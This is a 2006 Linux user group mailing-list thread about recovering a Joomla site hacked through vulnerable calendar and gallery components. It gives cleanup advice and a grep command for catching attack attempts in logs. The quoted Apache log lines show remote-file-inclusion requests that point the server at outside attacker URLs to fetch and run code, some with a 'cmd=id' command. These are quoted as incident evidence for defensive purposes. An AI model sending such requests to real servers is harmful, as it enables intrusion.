PLUG website down
JD Austin
jd at twingeckos.com
Tue Jul 18 20:54:03 MST 2006
Just delete the files from the backup (delete them from the site via ftp
too).
Be sure to look in these directories for signs of it:
components
modules
administrator/components/
administrator/modules
The site may not load right on the front end at first but you can log
into the administrator side,
uninstall the component and it's associated modules, and the front end
will work again.
It may complain during the uninstall about the files being missing but
it works out fine.
JD
PS.. mail to you directly bounces - relaying denied
Alan Dayley wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>JD Austin wrote:
>
>
>>If you're not on version 1.0.10 upgrade now:
>>http://www.joomla.org/content/view/1510/74/
>>I wouldn't be surprised if they make major changes in Joomla to stomp
>>out this type of thing.
>>
>>In all cases I've had an issue the database was unaffected, only the files.
>>After the initial panic that I might have been rooted I was relieved
>>when I found out how they whacked the index.php and configuration.php
>>files on a few of my inactive sites.
>>
>>After you restore the site, remove com_extcalendar and com_galeria if
>>they're still installed.
>>Check the directory structure to make sure they're gone.
>>Also check your temp directory for strangeness.. like a '.a' directory.
>>
>>If you check your logs you'll find stuff like this:
>>
>> XXXXX.org/statistics/logs/access_log:64.38.12.106 - - [18/Jul/2006:15:25:24 -0700] "GET /components/com_extcalendar/extcalendar.php?_*mosConfig_absolute_path=*__*http*_://www.podgorz.cc/cc5.php?? HTTP/1.0" 200 17757 "-" "Mozilla/5.0"
>> XXXXX.com/statistics/logs/access_log:85.104.97.199 - - [18/Jul/2006:09:47:29 -0700] "GET /components/com_galleria/galleria.html.php?_*mosConfig_absolute_path=*__*http*_://61.1.197.244/x/tool25.txt?&cmd=id HTTP/1.0" 404 958 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
>> XXXXX.com/statistics/logs/access_log:85.104.97.199 - - [18/Jul/2006:09:57:34 -0700] "GET /components/com_extcalendar/extcalendar.php?_*mosConfig_absolute_path=*__*http*_://61.1.197.244/x/tool25.txt?&cmd=id HTTP/1.0" 404 958 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
>>
>>
>>I regularly check to see what they're trying to circumvent now by
>>grepping for this type of vulnerability in the apache access logs:
>>/bin/grep mosConfig_absolute_path=http
>>/home/httpd/vhosts/*/statistics/logs/access_log | mail -s 'hack
>>attempts' jd at twingeckos.com
>>The location of your apache logs may be different. If you don't have
>>root you can download the logs for your domain and grep them locally.
>>
>>JD
>>
>>
>
>Thanks, JD. Good advice.
>
>I am in contact with Integrum. The site was, in fact, cracked via the
>ext_calendar component that I thought I had patched. Integrum caught it
>early this morning and took the site off line to thwart the attack. We
>are now discussing the means of getting back online without re-instating
>the vulnerability.
>
>It will probably be tomorrow before the site is back online simply
>because Integrum has been handling issues with it since very early this
>morning. They need to leave it for a while.
>
>I thank them for their efforts and support!
>
>I'll be on the phone with them tomorrow morning. I'll keep updating
>status here in the list.
>
>Alan
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.4.2 (GNU/Linux)
>Comment: Using GnuPG with SUSE - http://enigmail.mozdev.org
>
>iD8DBQFEvYi9DQw/VSQuFZYRAqpxAJ9vR3s9GGc+yvKCQ6ciMNCUNe1wPACfSHS1
>WcdlshZzjYH2ryyDdlyP6A8=
>=Np1E
>-----END PGP SIGNATURE-----
>---------------------------------------------------
>PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
>To subscribe, unsubscribe, or to change you mail settings:
>http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>
>
More information about the PLUG-discuss
mailing list